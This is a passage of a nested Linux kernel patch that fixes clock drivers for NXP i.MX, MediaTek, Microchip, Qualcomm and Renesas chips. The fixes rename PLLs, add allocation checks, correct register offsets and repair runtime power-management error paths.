+-	hws[IMX8MN_VPU_PLL_REF_SEL] = imx_clk_hw_mux("vpu_pll_ref_sel", base + 0x74, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
++	hws[IMX8MN_M7_ALT_PLL_REF_SEL] = imx_clk_hw_mux("m7_alt_pll_ref_sel", base + 0x74, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+ 	hws[IMX8MN_ARM_PLL_REF_SEL] = imx_clk_hw_mux("arm_pll_ref_sel", base + 0x84, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+ 	hws[IMX8MN_SYS_PLL3_REF_SEL] = imx_clk_hw_mux("sys_pll3_ref_sel", base + 0x114, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+ 
+ 	hws[IMX8MN_AUDIO_PLL1] = imx_clk_hw_pll14xx("audio_pll1", "audio_pll1_ref_sel", base, &imx_1443x_pll);
+ 	hws[IMX8MN_AUDIO_PLL2] = imx_clk_hw_pll14xx("audio_pll2", "audio_pll2_ref_sel", base + 0x14, &imx_1443x_pll);
+-	hws[IMX8MN_VIDEO_PLL1] = imx_clk_hw_pll14xx("video_pll1", "video_pll1_ref_sel", base + 0x28, &imx_1443x_pll);
++	hws[IMX8MN_VIDEO_PLL] = imx_clk_hw_pll14xx("video_pll", "video_pll_ref_sel", base + 0x28, &imx_1443x_pll);
+ 	hws[IMX8MN_DRAM_PLL] = imx_clk_hw_pll14xx("dram_pll", "dram_pll_ref_sel", base + 0x50, &imx_1443x_dram_pll);
+ 	hws[IMX8MN_GPU_PLL] = imx_clk_hw_pll14xx("gpu_pll", "gpu_pll_ref_sel", base + 0x64, &imx_1416x_pll);
+-	hws[IMX8MN_VPU_PLL] = imx_clk_hw_pll14xx("vpu_pll", "vpu_pll_ref_sel", base + 0x74, &imx_1416x_pll);
++	hws[IMX8MN_M7_ALT_PLL] = imx_clk_hw_pll14xx("m7_alt_pll", "m7_alt_pll_ref_sel", base + 0x74, &imx_1416x_pll);
+ 	hws[IMX8MN_ARM_PLL] = imx_clk_hw_pll14xx("arm_pll", "arm_pll_ref_sel", base + 0x84, &imx_1416x_pll);
+ 	hws[IMX8MN_SYS_PLL1] = imx_clk_hw_fixed("sys_pll1", 800000000);
+ 	hws[IMX8MN_SYS_PLL2] = imx_clk_hw_fixed("sys_pll2", 1000000000);
+@@ -370,20 +370,20 @@ static int imx8mn_clocks_probe(struct platform_device *pdev)
+ 	/* PLL bypass out */
+ 	hws[IMX8MN_AUDIO_PLL1_BYPASS] = imx_clk_hw_mux_flags("audio_pll1_bypass", base, 16, 1, audio_pll1_bypass_sels, ARRAY_SIZE(audio_pll1_bypass_sels), CLK_SET_RATE_PARENT);
+ 	hws[IMX8MN_AUDIO_PLL2_BYPASS] = imx_clk_hw_mux_flags("audio_pll2_bypass", base + 0x14, 16, 1, audio_pll2_bypass_sels, ARRAY_SIZE(audio_pll2_bypass_sels), CLK_SET_RATE_PARENT);
+-	hws[IMX8MN_VIDEO_PLL1_BYPASS] = imx_clk_hw_mux_flags("video_pll1_bypass", base + 0x28, 16, 1, video_pll1_bypass_sels, ARRAY_SIZE(video_pll1_bypass_sels), CLK_SET_RATE_PARENT);
++	hws[IMX8MN_VIDEO_PLL_BYPASS] = imx_clk_hw_mux_flags("video_pll_bypass", base + 0x28, 16, 1, video_pll_bypass_sels, ARRAY_SIZE(video_pll_bypass_sels), CLK_SET_RATE_PARENT);
+ 	hws[IMX8MN_DRAM_PLL_BYPASS] = imx_clk_hw_mux_flags("dram_pll_bypass", base + 0x50, 16, 1, dram_pll_bypass_sels, ARRAY_SIZE(dram_pll_bypass_sels), CLK_SET_RATE_PARENT);
+ 	hws[IMX8MN_GPU_PLL_BYPASS] = imx_clk_hw_mux_flags("gpu_pll_bypass", base + 0x64, 28, 1, gpu_pll_bypass_sels, ARRAY_SIZE(gpu_pll_bypass_sels), CLK_SET_RATE_PARENT);
+-	hws[IMX8MN_VPU_PLL_BYPASS] = imx_clk_hw_mux_flags("vpu_pll_bypass", base + 0x74, 28, 1, vpu_pll_bypass_sels, ARRAY_SIZE(vpu_pll_bypass_sels), CLK_SET_RATE_PARENT);
++	hws[IMX8MN_M7_ALT_PLL_BYPASS] = imx_clk_hw_mux_flags("m7_alt_pll_bypass", base + 0x74, 28, 1, m7_alt_pll_bypass_sels, ARRAY_SIZE(m7_alt_pll_bypass_sels), CLK_SET_RATE_PARENT);
+ 	hws[IMX8MN_ARM_PLL_BYPASS] = imx_clk_hw_mux_flags("arm_pll_bypass", base + 0x84, 28, 1, arm_pll_bypass_sels, ARRAY_SIZE(arm_pll_bypass_sels), CLK_SET_RATE_PARENT);
+ 	hws[IMX8MN_SYS_PLL3_BYPASS] = imx_clk_hw_mux_flags("sys_pll3_bypass", base + 0x114, 28, 1, sys_pll3_bypass_sels, ARRAY_SIZE(sys_pll3_bypass_sels), CLK_SET_RATE_PARENT);
+ 
+ 	/* PLL out gate */
+ 	hws[IMX8MN_AUDIO_PLL1_OUT] = imx_clk_hw_gate("audio_pll1_out", "audio_pll1_bypass", base, 13);
+ 	hws[IMX8MN_AUDIO_PLL2_OUT] = imx_clk_hw_gate("audio_pll2_out", "audio_pll2_bypass", base + 0x14, 13);
+-	hws[IMX8MN_VIDEO_PLL1_OUT] = imx_clk_hw_gate("video_pll1_out", "video_pll1_bypass", base + 0x28, 13);
++	hws[IMX8MN_VIDEO_PLL_OUT] = imx_clk_hw_gate("video_pll_out", "video_pll_bypass", base + 0x28, 13);
+ 	hws[IMX8MN_DRAM_PLL_OUT] = imx_clk_hw_gate("dram_pll_out", "dram_pll_bypass", base + 0x50, 13);
+ 	hws[IMX8MN_GPU_PLL_OUT] = imx_clk_hw_gate("gpu_pll_out", "gpu_pll_bypass", base + 0x64, 11);
+-	hws[IMX8MN_VPU_PLL_OUT] = imx_clk_hw_gate("vpu_pll_out", "vpu_pll_bypass", base + 0x74, 11);
++	hws[IMX8MN_M7_ALT_PLL_OUT] = imx_clk_hw_gate("m7_alt_pll_out", "m7_alt_pll_bypass", base + 0x74, 11);
+ 	hws[IMX8MN_ARM_PLL_OUT] = imx_clk_hw_gate("arm_pll_out", "arm_pll_bypass", base + 0x84, 11);
+ 	hws[IMX8MN_SYS_PLL3_OUT] = imx_clk_hw_gate("sys_pll3_out", "sys_pll3_bypass", base + 0x114, 11);
+ 
+diff --git a/drivers/clk/imx/clk-imx8mp.c b/drivers/clk/imx/clk-imx8mp.c
+index 652ae58c2735f..5d68d975b4eb1 100644
+--- a/drivers/clk/imx/clk-imx8mp.c
++++ b/drivers/clk/imx/clk-imx8mp.c
+@@ -17,6 +17,7 @@
+ 
+ static u32 share_count_nand;
+ static u32 share_count_media;
++static u32 share_count_usb;
+ 
+ static const char * const pll_ref_sels[] = { "osc_24m", "dummy", "dummy", "dummy", };
+ static const char * const audio_pll1_bypass_sels[] = {"audio_pll1", "audio_pll1_ref_sel", };
+@@ -673,7 +674,8 @@ static int imx8mp_clocks_probe(struct platform_device *pdev)
+ 	hws[IMX8MP_CLK_UART2_ROOT] = imx_clk_hw_gate4("uart2_root_clk", "uart2", ccm_base + 0x44a0, 0);
+ 	hws[IMX8MP_CLK_UART3_ROOT] = imx_clk_hw_gate4("uart3_root_clk", "uart3", ccm_base + 0x44b0, 0);
+ 	hws[IMX8MP_CLK_UART4_ROOT] = imx_clk_hw_gate4("uart4_root_clk", "uart4", ccm_base + 0x44c0, 0);
+-	hws[IMX8MP_CLK_USB_ROOT] = imx_clk_hw_gate4("usb_root_clk", "hsio_axi", ccm_base + 0x44d0, 0);
++	hws[IMX8MP_CLK_USB_ROOT] = imx_clk_hw_gate2_shared2("usb_root_clk", "hsio_axi", ccm_base + 0x44d0, 0, &share_count_usb);
++	hws[IMX8MP_CLK_USB_SUSP] = imx_clk_hw_gate2_shared2("usb_suspend_clk", "osc_32k", ccm_base + 0x44d0, 0, &share_count_usb);
+ 	hws[IMX8MP_CLK_USB_PHY_ROOT] = imx_clk_hw_gate4("usb_phy_root_clk", "usb_phy_ref", ccm_base + 0x44f0, 0);
+ 	hws[IMX8MP_CLK_USDHC1_ROOT] = imx_clk_hw_gate4("usdhc1_root_clk", "usdhc1", ccm_base + 0x4510, 0);
+ 	hws[IMX8MP_CLK_USDHC2_ROOT] = imx_clk_hw_gate4("usdhc2_root_clk", "usdhc2", ccm_base + 0x4520, 0);
+diff --git a/drivers/clk/imx/clk-imx93.c b/drivers/clk/imx/clk-imx93.c
+index 99cff1fd108b5..02d6a9894521d 100644
+--- a/drivers/clk/imx/clk-imx93.c
++++ b/drivers/clk/imx/clk-imx93.c
+@@ -170,7 +170,7 @@ static const struct imx93_clk_ccgr {
+ 	{ IMX93_CLK_MU2_B_GATE,		"mu2_b",	"bus_wakeup_root",	0x8500, 0, &share_count_mub },
+ 	{ IMX93_CLK_EDMA1_GATE,		"edma1",	"m33_root",		0x8540, },
+ 	{ IMX93_CLK_EDMA2_GATE,		"edma2",	"wakeup_axi_root",	0x8580, },
+-	{ IMX93_CLK_FLEXSPI1_GATE,	"flexspi",	"flexspi_root",		0x8640, },
++	{ IMX93_CLK_FLEXSPI1_GATE,	"flexspi1",	"flexspi1_root",	0x8640, },
+ 	{ IMX93_CLK_GPIO1_GATE,		"gpio1",	"m33_root",		0x8880, },
+ 	{ IMX93_CLK_GPIO2_GATE,		"gpio2",	"bus_wakeup_root",	0x88c0, },
+ 	{ IMX93_CLK_GPIO3_GATE,		"gpio3",	"bus_wakeup_root",	0x8900, },
+@@ -240,7 +240,7 @@ static const struct imx93_clk_ccgr {
+ 	{ IMX93_CLK_AUD_XCVR_GATE,	"aud_xcvr",	"audio_xcvr_root",	0x9b80, },
+ 	{ IMX93_CLK_SPDIF_GATE,		"spdif",	"spdif_root",		0x9c00, },
+ 	{ IMX93_CLK_HSIO_32K_GATE,	"hsio_32k",	"osc_32k",		0x9dc0, },
+-	{ IMX93_CLK_ENET1_GATE,		"enet1",	"enet_root",		0x9e00, },
++	{ IMX93_CLK_ENET1_GATE,		"enet1",	"wakeup_axi_root",	0x9e00, },
+ 	{ IMX93_CLK_ENET_QOS_GATE,	"enet_qos",	"wakeup_axi_root",	0x9e40, },
+ 	{ IMX93_CLK_SYS_CNT_GATE,	"sys_cnt",	"osc_24m",		0x9e80, },
+ 	{ IMX93_CLK_TSTMR1_GATE,	"tstmr1",	"bus_aon_root",		0x9ec0, },
+@@ -258,7 +258,7 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 	struct device_node *np = dev->of_node;
+ 	const struct imx93_clk_root *root;
+ 	const struct imx93_clk_ccgr *ccgr;
+-	void __iomem *base = NULL;
++	void __iomem *base, *anatop_base;
+ 	int i, ret;
+ 
+ 	clk_hw_data = kzalloc(struct_size(clk_hw_data, hws,
+@@ -285,20 +285,22 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 								    "sys_pll_pfd2", 1, 2);
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx93-anatop");
+-	base = of_iomap(np, 0);
++	anatop_base = of_iomap(np, 0);
+ 	of_node_put(np);
+-	if (WARN_ON(!base))
++	if (WARN_ON(!anatop_base))
+ 		return -ENOMEM;
+ 
+-	clks[IMX93_CLK_AUDIO_PLL] = imx_clk_fracn_gppll("audio_pll", "osc_24m", base + 0x1200,
++	clks[IMX93_CLK_AUDIO_PLL] = imx_clk_fracn_gppll("audio_pll", "osc_24m", anatop_base + 0x1200,
+ 							&imx_fracn_gppll);
+-	clks[IMX93_CLK_VIDEO_PLL] = imx_clk_fracn_gppll("video_pll", "osc_24m", base + 0x1400,
++	clks[IMX93_CLK_VIDEO_PLL] = imx_clk_fracn_gppll("video_pll", "osc_24m", anatop_base + 0x1400,
+ 							&imx_fracn_gppll);
+ 
+ 	np = dev->of_node;
+ 	base = devm_platform_ioremap_resource(pdev, 0);
+-	if (WARN_ON(IS_ERR(base)))
++	if (WARN_ON(IS_ERR(base))) {
++		iounmap(anatop_base);
+ 		return PTR_ERR(base);
++	}
+ 
+ 	for (i = 0; i < ARRAY_SIZE(root_array); i++) {
+ 		root = &root_array[i];
+@@ -327,6 +329,7 @@ static int imx93_clocks_probe(struct platform_device *pdev)
+ 
+ unregister_hws:
+ 	imx_unregister_hw_clocks(clks, IMX93_CLK_END);
++	iounmap(anatop_base);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/clk/imx/clk-imxrt1050.c b/drivers/clk/imx/clk-imxrt1050.c
+index 9539d35588ee9..26108e9f7e67a 100644
+--- a/drivers/clk/imx/clk-imxrt1050.c
++++ b/drivers/clk/imx/clk-imxrt1050.c
+@@ -140,7 +140,7 @@ static int imxrt1050_clocks_probe(struct platform_device *pdev)
+ 	hws[IMXRT1050_CLK_USDHC1] = imx_clk_hw_gate2("usdhc1", "usdhc1_podf", ccm_base + 0x80, 2);
+ 	hws[IMXRT1050_CLK_USDHC2] = imx_clk_hw_gate2("usdhc2", "usdhc2_podf", ccm_base + 0x80, 4);
+ 	hws[IMXRT1050_CLK_LPUART1] = imx_clk_hw_gate2("lpuart1", "lpuart_podf", ccm_base + 0x7c, 24);
+-	hws[IMXRT1050_CLK_LCDIF_APB] = imx_clk_hw_gate2("lcdif", "lcdif_podf", ccm_base + 0x74, 10);
++	hws[IMXRT1050_CLK_LCDIF_APB] = imx_clk_hw_gate2("lcdif", "lcdif_podf", ccm_base + 0x70, 28);
+ 	hws[IMXRT1050_CLK_DMA] = imx_clk_hw_gate("dma", "ipg", ccm_base + 0x7C, 6);
+ 	hws[IMXRT1050_CLK_DMA_MUX] = imx_clk_hw_gate("dmamux0", "ipg", ccm_base + 0x7C, 7);
+ 	imx_check_clk_hws(hws, IMXRT1050_CLK_END);
+diff --git a/drivers/clk/mediatek/clk-mt7986-infracfg.c b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+index d90727a53283c..49666047bf0ed 100644
+--- a/drivers/clk/mediatek/clk-mt7986-infracfg.c
++++ b/drivers/clk/mediatek/clk-mt7986-infracfg.c
+@@ -153,7 +153,7 @@ static const struct mtk_gate infra_clks[] = {
+ 		    18),
+ 	GATE_INFRA1(CLK_INFRA_MSDC_66M_CK, "infra_msdc_66m", "infra_sysaxi_d2",
+ 		    19),
+-	GATE_INFRA1(CLK_INFRA_ADC_26M_CK, "infra_adc_26m", "csw_f26m_sel", 20),
++	GATE_INFRA1(CLK_INFRA_ADC_26M_CK, "infra_adc_26m", "infra_adc_frc", 20),
+ 	GATE_INFRA1(CLK_INFRA_ADC_FRC_CK, "infra_adc_frc", "csw_f26m_sel", 21),
+ 	GATE_INFRA1(CLK_INFRA_FBIST2FPC_CK, "infra_fbist2fpc", "nfi1x_sel", 23),
+ 	/* INFRA2 */
+diff --git a/drivers/clk/microchip/clk-mpfs-ccc.c b/drivers/clk/microchip/clk-mpfs-ccc.c
+index 7be028dced63d..32aae880a14f3 100644
+--- a/drivers/clk/microchip/clk-mpfs-ccc.c
++++ b/drivers/clk/microchip/clk-mpfs-ccc.c
+@@ -166,6 +166,9 @@ static int mpfs_ccc_register_outputs(struct device *dev, struct mpfs_ccc_out_hw_
+ 		struct mpfs_ccc_out_hw_clock *out_hw = &out_hws[i];
+ 		char *name = devm_kzalloc(dev, 23, GFP_KERNEL);
+ 
++		if (!name)
++			return -ENOMEM;
++
+ 		snprintf(name, 23, "%s_out%u", parent->name, i);
+ 		out_hw->divider.hw.init = CLK_HW_INIT_HW(name, &parent->hw, &clk_divider_ops, 0);
+ 		out_hw->divider.reg = data->pll_base[i / MPFS_CCC_OUTPUTS_PER_PLL] +
+@@ -200,6 +203,9 @@ static int mpfs_ccc_register_plls(struct device *dev, struct mpfs_ccc_pll_hw_clo
+ 		struct mpfs_ccc_pll_hw_clock *pll_hw = &pll_hws[i];
+ 		char *name = devm_kzalloc(dev, 18, GFP_KERNEL);
+ 
++		if (!name)
++			return -ENOMEM;
++
+ 		pll_hw->base = data->pll_base[i];
+ 		snprintf(name, 18, "ccc%s_pll%u", strchrnul(dev->of_node->full_name, '@'), i);
+ 		pll_hw->name = (const char *)name;
+diff --git a/drivers/clk/qcom/clk-krait.c b/drivers/clk/qcom/clk-krait.c
+index 45da736bd5f4c..293a9dfa7151a 100644
+--- a/drivers/clk/qcom/clk-krait.c
++++ b/drivers/clk/qcom/clk-krait.c
+@@ -114,6 +114,8 @@ static int krait_div2_set_rate(struct clk_hw *hw, unsigned long rate,
+ 
+ 	if (d->lpl)
+ 		mask = mask << (d->shift + LPL_SHIFT) | mask << d->shift;
++	else
++		mask <<= d->shift;
+ 
+ 	spin_lock_irqsave(&krait_clock_reg_lock, flags);
+ 	val = krait_get_l2_indirect_reg(d->offset);
+diff --git a/drivers/clk/qcom/dispcc-sm6350.c b/drivers/clk/qcom/dispcc-sm6350.c
+index 0c3c2e26ede90..ea6f54ed846ec 100644
+--- a/drivers/clk/qcom/dispcc-sm6350.c
++++ b/drivers/clk/qcom/dispcc-sm6350.c
+@@ -306,7 +306,7 @@ static struct clk_rcg2 disp_cc_mdss_pclk0_clk_src = {
+ 		.name = "disp_cc_mdss_pclk0_clk_src",
+ 		.parent_data = disp_cc_parent_data_5,
+ 		.num_parents = ARRAY_SIZE(disp_cc_parent_data_5),
+-		.flags = CLK_SET_RATE_PARENT | CLK_GET_RATE_NOCACHE,
++		.flags = CLK_SET_RATE_PARENT | CLK_GET_RATE_NOCACHE | CLK_OPS_PARENT_ENABLE,
+ 		.ops = &clk_pixel_ops,
+ 	},
+ };
+@@ -385,7 +385,7 @@ static struct clk_branch disp_cc_mdss_byte0_clk = {
+ 				&disp_cc_mdss_byte0_clk_src.clkr.hw,
+ 			},
+ 			.num_parents = 1,
+-			.flags = CLK_SET_RATE_PARENT | CLK_GET_RATE_NOCACHE,
++			.flags = CLK_SET_RATE_PARENT | CLK_GET_RATE_NOCACHE | CLK_OPS_PARENT_ENABLE,
+ 			.ops = &clk_branch2_ops,
+ 		},
+ 	},
+diff --git a/drivers/clk/qcom/gcc-ipq806x.c b/drivers/clk/qcom/gcc-ipq806x.c
+index 718de17a1e600..6447f3e81b555 100644
+--- a/drivers/clk/qcom/gcc-ipq806x.c
++++ b/drivers/clk/qcom/gcc-ipq806x.c
+@@ -79,7 +79,9 @@ static struct clk_regmap pll4_vote = {
+ 	.enable_mask = BIT(4),
+ 	.hw.init = &(struct clk_init_data){
+ 		.name = "pll4_vote",
+-		.parent_names = (const char *[]){ "pll4" },
++		.parent_data = &(const struct clk_parent_data){
++			.fw_name = "pll4", .name = "pll4",
++		},
+ 		.num_parents = 1,
+ 		.ops = &clk_pll_vote_ops,
+ 	},
+diff --git a/drivers/clk/qcom/gcc-sm8250.c b/drivers/clk/qcom/gcc-sm8250.c
+index 9755ef4888c19..a0ba37656b07b 100644
+--- a/drivers/clk/qcom/gcc-sm8250.c
++++ b/drivers/clk/qcom/gcc-sm8250.c
+@@ -3267,7 +3267,7 @@ static struct gdsc usb30_prim_gdsc = {
+ 	.pd = {
+ 		.name = "usb30_prim_gdsc",
+ 	},
+-	.pwrsts = PWRSTS_OFF_ON,
++	.pwrsts = PWRSTS_RET_ON,
+ };
+ 
+ static struct gdsc usb30_sec_gdsc = {
+@@ -3275,7 +3275,7 @@ static struct gdsc usb30_sec_gdsc = {
+ 	.pd = {
+ 		.name = "usb30_sec_gdsc",
+ 	},
+-	.pwrsts = PWRSTS_OFF_ON,
++	.pwrsts = PWRSTS_RET_ON,
+ };
+ 
+ static struct gdsc hlos1_vote_mmnoc_mmu_tbu_hf0_gdsc = {
+diff --git a/drivers/clk/qcom/lpassaudiocc-sc7280.c b/drivers/clk/qcom/lpassaudiocc-sc7280.c
+index 063e0365f3119..1339f9211a149 100644
+--- a/drivers/clk/qcom/lpassaudiocc-sc7280.c
++++ b/drivers/clk/qcom/lpassaudiocc-sc7280.c
+@@ -722,33 +722,17 @@ static const struct of_device_id lpass_audio_cc_sc7280_match_table[] = {
+ };
+ MODULE_DEVICE_TABLE(of, lpass_audio_cc_sc7280_match_table);
+ 
+-static void lpassaudio_pm_runtime_disable(void *data)
+-{
+-	pm_runtime_disable(data);
+-}
+-
+-static void lpassaudio_pm_clk_destroy(void *data)
+-{
+-	pm_clk_destroy(data);
+-}
+-
+-static int lpassaudio_create_pm_clks(struct platform_device *pdev)
++static int lpass_audio_setup_runtime_pm(struct platform_device *pdev)
+ {
+ 	int ret;
+ 
+ 	pm_runtime_use_autosuspend(&pdev->dev);
+ 	pm_runtime_set_autosuspend_delay(&pdev->dev, 50);
+-	pm_runtime_enable(&pdev->dev);
+-
+-	ret = devm_add_action_or_reset(&pdev->dev, lpassaudio_pm_runtime_disable, &pdev->dev);
+-	if (ret)
+-		return ret;
+-
+-	ret = pm_clk_create(&pdev->dev);
++	ret = devm_pm_runtime_enable(&pdev->dev);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = devm_add_action_or_reset(&pdev->dev, lpassaudio_pm_clk_destroy, &pdev->dev);
++	ret = devm_pm_clk_create(&pdev->dev);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -756,7 +740,7 @@ static int lpassaudio_create_pm_clks(struct platform_device *pdev)
+ 	if (ret < 0)
+ 		dev_err(&pdev->dev, "failed to acquire iface clock\n");
+ 
+-	return ret;
++	return pm_runtime_resume_and_get(&pdev->dev);
+ }
+ 
+ static int lpass_audio_cc_sc7280_probe(struct platform_device *pdev)
+@@ -765,7 +749,7 @@ static int lpass_audio_cc_sc7280_probe(struct platform_device *pdev)
+ 	struct regmap *regmap;
+ 	int ret;
+ 
+-	ret = lpassaudio_create_pm_clks(pdev);
++	ret = lpass_audio_setup_runtime_pm(pdev);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -775,8 +759,8 @@ static int lpass_audio_cc_sc7280_probe(struct platform_device *pdev)
+ 
+ 	regmap = qcom_cc_map(pdev, desc);
+ 	if (IS_ERR(regmap)) {
+-		pm_runtime_disable(&pdev->dev);
+-		return PTR_ERR(regmap);
++		ret = PTR_ERR(regmap);
++		goto exit;
+ 	}
+ 
+ 	clk_zonda_pll_configure(&lpass_audio_cc_pll, regmap, &lpass_audio_cc_pll_config);
+@@ -788,20 +772,18 @@ static int lpass_audio_cc_sc7280_probe(struct platform_device *pdev)
+ 	ret = qcom_cc_really_probe(pdev, &lpass_audio_cc_sc7280_desc, regmap);
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "Failed to register LPASS AUDIO CC clocks\n");
+-		pm_runtime_disable(&pdev->dev);
+-		return ret;
++		goto exit;
+ 	}
+ 
+ 	ret = qcom_cc_probe_by_index(pdev, 1, &lpass_audio_cc_reset_sc7280_desc);
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "Failed to register LPASS AUDIO CC Resets\n");
+-		pm_runtime_disable(&pdev->dev);
+-		return ret;
++		goto exit;
+ 	}
+ 
+ 	pm_runtime_mark_last_busy(&pdev->dev);
++exit:
+ 	pm_runtime_put_autosuspend(&pdev->dev);
+-	pm_runtime_put_sync(&pdev->dev);
+ 
+ 	return ret;
+ }
+@@ -839,14 +821,15 @@ static int lpass_aon_cc_sc7280_probe(struct platform_device *pdev)
+ 	struct regmap *regmap;
+ 	int ret;
+ 
+-	ret = lpassaudio_create_pm_clks(pdev);
++	ret = lpass_audio_setup_runtime_pm(pdev);
+ 	if (ret)
+ 		return ret;
+ 
+ 	if (of_property_read_bool(pdev->dev.of_node, "qcom,adsp-pil-mode")) {
+ 		lpass_audio_cc_sc7280_regmap_config.name = "cc";
+ 		desc = &lpass_cc_sc7280_desc;
+-		return qcom_cc_probe(pdev, desc);
++		ret = qcom_cc_probe(pdev, desc);
++		goto exit;
+ 	}
+ 
+ 	lpass_audio_cc_sc7280_regmap_config.name = "lpasscc_aon";
+@@ -854,18 +837,22 @@ static int lpass_aon_cc_sc7280_probe(struct platform_device *pdev)
+ 	desc = &lpass_aon_cc_sc7280_desc;
+ 
+ 	regmap = qcom_cc_map(pdev, desc);
+-	if (IS_ERR(regmap))
+-		return PTR_ERR(regmap);
++	if (IS_ERR(regmap)) {
++		ret = PTR_ERR(regmap);
++		goto exit;
++	}
+ 
+ 	clk_lucid_pll_configure(&lpass_aon_cc_pll, regmap, &lpass_aon_cc_pll_config);
+ 
+ 	ret = qcom_cc_really_probe(pdev, &lpass_aon_cc_sc7280_desc, regmap);
+-	if (ret)
++	if (ret) {
+ 		dev_err(&pdev->dev, "Failed to register LPASS AON CC clocks\n");
++		goto exit;
++	}
+ 
+ 	pm_runtime_mark_last_busy(&pdev->dev);
++exit:
+ 	pm_runtime_put_autosuspend(&pdev->dev);
+-	pm_runtime_put_sync(&pdev->dev);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/clk/qcom/lpasscorecc-sc7180.c b/drivers/clk/qcom/lpasscorecc-sc7180.c
+index ac09b7b840aba..a5731994cbed1 100644
+--- a/drivers/clk/qcom/lpasscorecc-sc7180.c
++++ b/drivers/clk/qcom/lpasscorecc-sc7180.c
+@@ -356,7 +356,7 @@ static const struct qcom_cc_desc lpass_audio_hm_sc7180_desc = {
+ 	.num_gdscs = ARRAY_SIZE(lpass_audio_hm_sc7180_gdscs),
+ };
+ 
+-static int lpass_create_pm_clks(struct platform_device *pdev)
++static int lpass_setup_runtime_pm(struct platform_device *pdev)
+ {
+ 	int ret;
+ 
+@@ -375,7 +375,7 @@ static int lpass_create_pm_clks(struct platform_device *pdev)
+ 	if (ret < 0)
+ 		dev_err(&pdev->dev, "failed to acquire iface clock\n");
+ 
+-	return ret;
++	return pm_runtime_resume_and_get(&pdev->dev);
+ }
+ 
+ static int lpass_core_cc_sc7180_probe(struct platform_device *pdev)
+@@ -384,7 +384,7 @@ static int lpass_core_cc_sc7180_probe(struct platform_device *pdev)
+ 	struct regmap *regmap;
+ 	int ret;
+ 
+-	ret = lpass_create_pm_clks(pdev);
++	ret = lpass_setup_runtime_pm(pdev);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -392,12 +392,14 @@ static int lpass_core_cc_sc7180_probe(struct platform_device *pdev)
+ 	desc = &lpass_audio_hm_sc7180_desc;
+ 	ret = qcom_cc_probe_by_index(pdev, 1, desc);
+ 	if (ret)
+-		return ret;
++		goto exit;
+ 
+ 	lpass_core_cc_sc7180_regmap_config.name = "lpass_core_cc";
+ 	regmap = qcom_cc_map(pdev, &lpass_core_cc_sc7180_desc);
+-	if (IS_ERR(regmap))
+-		return PTR_ERR(regmap);
++	if (IS_ERR(regmap)) {
++		ret = PTR_ERR(regmap);
++		goto exit;
++	}
+ 
+ 	/*
+ 	 * Keep the CLK always-ON
+@@ -415,6 +417,7 @@ static int lpass_core_cc_sc7180_probe(struct platform_device *pdev)
+ 	ret = qcom_cc_really_probe(pdev, &lpass_core_cc_sc7180_desc, regmap);
+ 
+ 	pm_runtime_mark_last_busy(&pdev->dev);
++exit:
+ 	pm_runtime_put_autosuspend(&pdev->dev);
+ 
+ 	return ret;
+@@ -425,14 +428,19 @@ static int lpass_hm_core_probe(struct platform_device *pdev)
+ 	const struct qcom_cc_desc *desc;
+ 	int ret;
+ 
+-	ret = lpass_create_pm_clks(pdev);
++	ret = lpass_setup_runtime_pm(pdev);
+ 	if (ret)
+ 		return ret;
+ 
+ 	lpass_core_cc_sc7180_regmap_config.name = "lpass_hm_core";
+ 	desc = &lpass_core_hm_sc7180_desc;
+ 
+-	return qcom_cc_probe_by_index(pdev, 0, desc);
++	ret = qcom_cc_probe_by_index(pdev, 0, desc);
++
++	pm_runtime_mark_last_busy(&pdev->dev);
++	pm_runtime_put_autosuspend(&pdev->dev);
++
++	return ret;
+ }
+ 
+ static const struct of_device_id lpass_hm_sc7180_match_table[] = {
+diff --git a/drivers/clk/renesas/r8a779a0-cpg-mssr.c b/drivers/clk/renesas/r8a779a0-cpg-mssr.c
+index d74d46833012f..e02542ca24a06 100644
+--- a/drivers/clk/renesas/r8a779a0-cpg-mssr.c
++++ b/drivers/clk/renesas/r8a779a0-cpg-mssr.c
+@@ -116,7 +116,7 @@ static const struct cpg_core_clk r8a779a0_core_clks[] __initconst = {
+ 	DEF_FIXED("cp",		R8A779A0_CLK_CP,	CLK_EXTAL,	2, 1),
+ 	DEF_FIXED("cl16mck",	R8A779A0_CLK_CL16MCK,	CLK_PLL1_DIV2,	64, 1),
+ 
+-	DEF_GEN4_SDH("sdh0",	R8A779A0_CLK_SD0H,	CLK_SDSRC,	   0x870),
++	DEF_GEN4_SDH("sd0h",	R8A779A0_CLK_SD0H,	CLK_SDSRC,	   0x870),
+ 	DEF_GEN4_SD("sd0",	R8A779A0_CLK_SD0,	R8A779A0_CLK_SD0H, 0x870),
+ 
+ 	DEF_BASE("rpc",		R8A779A0_CLK_RPC, CLK_TYPE_GEN4_RPC, CLK_RPCSRC),
+diff --git a/drivers/clk/renesas/r8a779f0-cpg-mssr.c b/drivers/clk/renesas/r8a779f0-cpg-mssr.c
+index 4baf355e26d88..27b668def357f 100644
+--- a/drivers/clk/renesas/r8a779f0-cpg-mssr.c
++++ b/drivers/clk/renesas/r8a779f0-cpg-mssr.c
+@@ -113,7 +113,7 @@ static const struct cpg_core_clk r8a779f0_core_clks[] __initconst = {
+ 	DEF_FIXED("sasyncperd2", R8A779F0_CLK_SASYNCPERD2, R8A779F0_CLK_SASYNCPERD1, 2, 1),
+ 	DEF_FIXED("sasyncperd4", R8A779F0_CLK_SASYNCPERD4, R8A779F0_CLK_SASYNCPERD1, 4, 1),
+ 
+-	DEF_GEN4_SDH("sdh0",	R8A779F0_CLK_SD0H,	CLK_SDSRC,	   0x870),
++	DEF_GEN4_SDH("sd0h",	R8A779F0_CLK_SD0H,	CLK_SDSRC,	   0x870),
